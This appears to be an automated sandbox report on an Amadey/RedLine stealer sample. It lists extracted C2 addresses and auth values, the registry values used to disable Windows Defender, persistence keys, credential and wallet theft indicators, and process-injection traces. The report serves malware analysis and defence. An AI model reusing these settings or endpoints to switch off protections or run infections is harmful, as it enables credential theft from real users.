amadey | c4ef1228abcdda75e41654382f23ea8ad5cc63e8dd36d0050da6b75c69b3901a

Analysis

max time kernel
150s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
21-02-2023 17:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1d4e32342fa8f49457db23f9c0ecccd7.exe
Size

1.0MB
MD5

1d4e32342fa8f49457db23f9c0ecccd7
SHA1

c72c4df7bcaaaba76c996410db9a9905867eb525
SHA256

c4ef1228abcdda75e41654382f23ea8ad5cc63e8dd36d0050da6b75c69b3901a
SHA512

a351f37fb9d8973264811194be470927352d40768f250f2df1f7065eae87ec1acd48c80952f1e749f75e49a4f361c96c1ad33f425fbb104a384f5da1c3a427b7
SSDEEP

24576:uyGcvVe497p8wuzEQA0V2vbctOLFxptFIh+/+Xy:9Gcvw4lp9uz+8+bLtTIh

Score

10^/10

amadey redline funka kk1 kk1n ronur discovery evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

ronur

193.233.20.20:4134

Attributes

auth_value
f88f86755a528d4b25f6f3628c460965

Extracted

Family

redline

Botnet

funka

193.233.20.20:4134

Attributes

auth_value
cdb395608d7ec633dce3d2f0c7fb0741

Extracted

Family

redline

Botnet

kk1

176.113.115.17:4132

Attributes

auth_value
df169d3f7f631272f7c6bd9a1bb603c3

Extracted

Family

amadey

Version

3.67

193.233.20.15/dF30Hn4m/index.php

Extracted

Family

amadey

Version

3.66

62.204.41.88/9vdVVVjsw/index.php

Extracted

Family

redline

Botnet

kk1n

176.113.115.17:4132

Attributes

auth_value
7cc0dba66fd38fdcaf3bf43899aeaf59

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

ibp79qV.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	ibp79qV.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	ibp79qV.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	ibp79qV.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	ibp79qV.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	ibp79qV.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	ibp79qV.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 19 IoCs

Processes:

resource	yara_rule
behavioral2/memory/324-205-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-206-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-208-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-210-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-212-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-214-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-216-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-218-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-220-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-222-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-226-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-229-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-232-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-234-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-236-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-238-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-240-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/324-242-0x0000000004B60000-0x0000000004B9E000-memory.dmp	family_redline
behavioral2/memory/3968-1273-0x0000000004CA0000-0x0000000004CB0000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 1284 created 2408	1284	powershell.exe	Explorer.EXE
PID 1284 created 2408	1284	powershell.exe	Explorer.EXE
PID 1284 created 2408	1284	powershell.exe	Explorer.EXE

Downloads MZ/PE file

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rDX51rY.exemnolyk.exelebro.exenbveek.exesetup.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	rDX51rY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	mnolyk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	lebro.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	nbveek.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	setup.exe

Executes dropped EXE 22 IoCs

Processes:

sDa62UL.exesse93sy.exesSr11Yh.exeibp79qV.exekFb38vG.exemDl82uR.exenOW04or.exerDX51rY.exemnolyk.exetruno.exenGh16yB65.exeeen09zY.exelebro.exenbveek.exemnolyk.exeInstallerr.exenbveek.exesetup.exehWQ63hB.exeneT55Qx.exemnolyk.exenbveek.exe

pid	process
1384	sDa62UL.exe
816	sse93sy.exe
4596	sSr11Yh.exe
1356	ibp79qV.exe
324	kFb38vG.exe
4928	mDl82uR.exe
4512	nOW04or.exe
3888	rDX51rY.exe
1400	mnolyk.exe
4548	truno.exe
1332	nGh16yB65.exe
3968	een09zY.exe
4188	lebro.exe
1464	nbveek.exe
2024	mnolyk.exe
1700	Installerr.exe
1932	nbveek.exe
3944	setup.exe
2980	hWQ63hB.exe
368	neT55Qx.exe
1428	mnolyk.exe
1648	nbveek.exe

Loads dropped DLL 5 IoCs

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exe

pid process

3404 rundll32.exe
1788 rundll32.exe
2172 rundll32.exe
2240 rundll32.exe
948 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3404	rundll32.exe
1788	rundll32.exe
2172	rundll32.exe
2240	rundll32.exe
948	rundll32.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

ibp79qV.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	ibp79qV.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	ibp79qV.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 15 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

truno.exenGh16yB65.exeInstallerr.exesse93sy.exesSr11Yh.exe1d4e32342fa8f49457db23f9c0ecccd7.exesDa62UL.exemnolyk.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	truno.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	nGh16yB65.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	Installerr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	sse93sy.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	truno.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	sSr11Yh.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	1d4e32342fa8f49457db23f9c0ecccd7.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	sse93sy.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	sDa62UL.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	sSr11Yh.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	nGh16yB65.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\truno.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000007051\\truno.exe"	mnolyk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Installerr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	1d4e32342fa8f49457db23f9c0ecccd7.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	sDa62UL.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 5 IoCs

Processes:

cmd.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Google\Libs\g.log	cmd.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Google\Libs\WR64.sys	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

rundll32.exe

pid process

3404 rundll32.exe
3404 rundll32.exe

pid	process
3404	rundll32.exe
3404	rundll32.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

nOW04or.exepowershell.exe

description	pid	process	target process
PID 4512 set thread context of 1336	4512	nOW04or.exe	AppLaunch.exe
PID 1284 set thread context of 2728	1284	powershell.exe	dwm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3808	1356	WerFault.exe	ibp79qV.exe
2728	324	WerFault.exe	kFb38vG.exe
3468	3968	WerFault.exe	een09zY.exe
3456	2240	WerFault.exe	rundll32.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4204 schtasks.exe
544 schtasks.exe

pid	process
4204	schtasks.exe
544	schtasks.exe

Modifies data under HKEY_USERS 50 IoCs

Processes:

powershell.exedwm.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	mshta.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	mshta.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	mshta.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	mshta.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	mshta.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dwm.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ibp79qV.exekFb38vG.exemDl82uR.exeAppLaunch.exerundll32.exepowershell.exedllhost.exepowershell.exeeen09zY.exehWQ63hB.exeneT55Qx.exedwm.exe

pid	process
1356	ibp79qV.exe
1356	ibp79qV.exe
324	kFb38vG.exe
324	kFb38vG.exe
4928	mDl82uR.exe
4928	mDl82uR.exe
1336	AppLaunch.exe
1336	AppLaunch.exe
3404	rundll32.exe
3404	rundll32.exe
3404	rundll32.exe
3404	rundll32.exe
3404	rundll32.exe
3404	rundll32.exe
3404	rundll32.exe
3404	rundll32.exe
2616	powershell.exe
1192	dllhost.exe
2616
1284	powershell.exe
1284	powershell.exe
3968	een09zY.exe
3968	een09zY.exe
2980	hWQ63hB.exe
2980	hWQ63hB.exe
368	neT55Qx.exe
368	neT55Qx.exe
1284	powershell.exe
1284	powershell.exe
1284	powershell.exe
1284	powershell.exe
1284	powershell.exe
1284	powershell.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe
2728	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

664

pid	process
664

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

ibp79qV.exekFb38vG.exemDl82uR.exeAppLaunch.exeeen09zY.exepowershell.exedllhost.exe

description	pid	process
Token: SeDebugPrivilege	1356	ibp79qV.exe
Token: SeDebugPrivilege	324	kFb38vG.exe
Token: SeDebugPrivilege	4928	mDl82uR.exe
Token: SeDebugPrivilege	1336	AppLaunch.exe
Token: SeDebugPrivilege	3968	een09zY.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	1192	dllhost.exe
Token: SeIncreaseQuotaPrivilege	1192	dllhost.exe
Token: SeSecurityPrivilege	1192	dllhost.exe
Token: SeTakeOwnershipPrivilege	1192	dllhost.exe
Token: SeLoadDriverPrivilege	1192	dllhost.exe
Token: SeSystemProfilePrivilege	1192	dllhost.exe
Token: SeSystemtimePrivilege	1192	dllhost.exe
Token: SeProfSingleProcessPrivilege	1192	dllhost.exe
Token: SeIncBasePriorityPrivilege	1192	dllhost.exe
Token: SeCreatePagefilePrivilege	1192	dllhost.exe
Token: SeBackupPrivilege	1192	dllhost.exe
Token: SeRestorePrivilege	1192	dllhost.exe
Token: SeShutdownPrivilege	1192	dllhost.exe
Token: SeDebugPrivilege	1192	dllhost.exe
Token: SeSystemEnvironmentPrivilege	1192	dllhost.exe
Token: SeRemoteShutdownPrivilege	1192	dllhost.exe
Token: SeUndockPrivilege	1192	dllhost.exe
Token: SeManageVolumePrivilege	1192	dllhost.exe
Token: 33	1192	dllhost.exe
Token: 34	1192	dllhost.exe
Token: 35	1192	dllhost.exe
Token: 36	1192	dllhost.exe
Token: SeIncreaseQuotaPrivilege	1192	dllhost.exe
Token: SeSecurityPrivilege	1192	dllhost.exe
Token: SeTakeOwnershipPrivilege	1192	dllhost.exe
Token: SeLoadDriverPrivilege	1192	dllhost.exe
Token: SeSystemProfilePrivilege	1192	dllhost.exe
Token: SeSystemtimePrivilege	1192	dllhost.exe
Token: SeProfSingleProcessPrivilege	1192	dllhost.exe
Token: SeIncBasePriorityPrivilege	1192	dllhost.exe
Token: SeCreatePagefilePrivilege	1192	dllhost.exe
Token: SeBackupPrivilege	1192	dllhost.exe
Token: SeRestorePrivilege	1192	dllhost.exe
Token: SeShutdownPrivilege	1192	dllhost.exe
Token: SeDebugPrivilege	1192	dllhost.exe
Token: SeSystemEnvironmentPrivilege	1192	dllhost.exe
Token: SeRemoteShutdownPrivilege	1192	dllhost.exe
Token: SeUndockPrivilege	1192	dllhost.exe
Token: SeManageVolumePrivilege	1192	dllhost.exe
Token: 33	1192	dllhost.exe
Token: 34	1192	dllhost.exe
Token: 35	1192	dllhost.exe
Token: 36	1192	dllhost.exe
Token: SeIncreaseQuotaPrivilege	1192	dllhost.exe
Token: SeSecurityPrivilege	1192	dllhost.exe
Token: SeTakeOwnershipPrivilege	1192	dllhost.exe
Token: SeLoadDriverPrivilege	1192	dllhost.exe
Token: SeSystemProfilePrivilege	1192	dllhost.exe
Token: SeSystemtimePrivilege	1192	dllhost.exe
Token: SeProfSingleProcessPrivilege	1192	dllhost.exe
Token: SeIncBasePriorityPrivilege	1192	dllhost.exe
Token: SeCreatePagefilePrivilege	1192	dllhost.exe
Token: SeBackupPrivilege	1192	dllhost.exe
Token: SeRestorePrivilege	1192	dllhost.exe
Token: SeShutdownPrivilege	1192	dllhost.exe
Token: SeDebugPrivilege	1192	dllhost.exe
Token: SeSystemEnvironmentPrivilege	1192	dllhost.exe
Token: SeRemoteShutdownPrivilege	1192	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1d4e32342fa8f49457db23f9c0ecccd7.exesDa62UL.exesse93sy.exesSr11Yh.exenOW04or.exerDX51rY.exemnolyk.execmd.exetruno.exenGh16yB65.exe

description	pid	process	target process
PID 4384 wrote to memory of 1384	4384	1d4e32342fa8f49457db23f9c0ecccd7.exe	sDa62UL.exe
PID 4384 wrote to memory of 1384	4384	1d4e32342fa8f49457db23f9c0ecccd7.exe	sDa62UL.exe
PID 4384 wrote to memory of 1384	4384	1d4e32342fa8f49457db23f9c0ecccd7.exe	sDa62UL.exe
PID 1384 wrote to memory of 816	1384	sDa62UL.exe	sse93sy.exe
PID 1384 wrote to memory of 816	1384	sDa62UL.exe	sse93sy.exe
PID 1384 wrote to memory of 816	1384	sDa62UL.exe	sse93sy.exe
PID 816 wrote to memory of 4596	816	sse93sy.exe	sSr11Yh.exe
PID 816 wrote to memory of 4596	816	sse93sy.exe	sSr11Yh.exe
PID 816 wrote to memory of 4596	816	sse93sy.exe	sSr11Yh.exe
PID 4596 wrote to memory of 1356	4596	sSr11Yh.exe	ibp79qV.exe
PID 4596 wrote to memory of 1356	4596	sSr11Yh.exe	ibp79qV.exe
PID 4596 wrote to memory of 1356	4596	sSr11Yh.exe	ibp79qV.exe
PID 4596 wrote to memory of 324	4596	sSr11Yh.exe	kFb38vG.exe
PID 4596 wrote to memory of 324	4596	sSr11Yh.exe	kFb38vG.exe
PID 4596 wrote to memory of 324	4596	sSr11Yh.exe	kFb38vG.exe
PID 816 wrote to memory of 4928	816	sse93sy.exe	mDl82uR.exe
PID 816 wrote to memory of 4928	816	sse93sy.exe	mDl82uR.exe
PID 816 wrote to memory of 4928	816	sse93sy.exe	mDl82uR.exe
PID 1384 wrote to memory of 4512	1384	sDa62UL.exe	nOW04or.exe
PID 1384 wrote to memory of 4512	1384	sDa62UL.exe	nOW04or.exe
PID 1384 wrote to memory of 4512	1384	sDa62UL.exe	nOW04or.exe
PID 4512 wrote to memory of 1336	4512	nOW04or.exe	AppLaunch.exe
PID 4512 wrote to memory of 1336	4512	nOW04or.exe	AppLaunch.exe
PID 4512 wrote to memory of 1336	4512	nOW04or.exe	AppLaunch.exe
PID 4512 wrote to memory of 1336	4512	nOW04or.exe	AppLaunch.exe
PID 4512 wrote to memory of 1336	4512	nOW04or.exe	AppLaunch.exe
PID 4384 wrote to memory of 3888	4384	1d4e32342fa8f49457db23f9c0ecccd7.exe	rDX51rY.exe
PID 4384 wrote to memory of 3888	4384	1d4e32342fa8f49457db23f9c0ecccd7.exe	rDX51rY.exe
PID 4384 wrote to memory of 3888	4384	1d4e32342fa8f49457db23f9c0ecccd7.exe	rDX51rY.exe
PID 3888 wrote to memory of 1400	3888	rDX51rY.exe	mnolyk.exe
PID 3888 wrote to memory of 1400	3888	rDX51rY.exe	mnolyk.exe
PID 3888 wrote to memory of 1400	3888	rDX51rY.exe	mnolyk.exe
PID 1400 wrote to memory of 4204	1400	mnolyk.exe	schtasks.exe
PID 1400 wrote to memory of 4204	1400	mnolyk.exe	schtasks.exe
PID 1400 wrote to memory of 4204	1400	mnolyk.exe	schtasks.exe
PID 1400 wrote to memory of 4680	1400	mnolyk.exe	cmd.exe
PID 1400 wrote to memory of 4680	1400	mnolyk.exe	cmd.exe
PID 1400 wrote to memory of 4680	1400	mnolyk.exe	cmd.exe
PID 4680 wrote to memory of 4772	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 4772	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 4772	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 1072	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 1072	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 1072	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 3324	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 3324	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 3324	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 1348	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 1348	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 1348	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 3380	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 3380	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 3380	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 3792	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 3792	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 3792	4680	cmd.exe	cacls.exe
PID 1400 wrote to memory of 4548	1400	mnolyk.exe	truno.exe
PID 1400 wrote to memory of 4548	1400	mnolyk.exe	truno.exe
PID 1400 wrote to memory of 4548	1400	mnolyk.exe	truno.exe
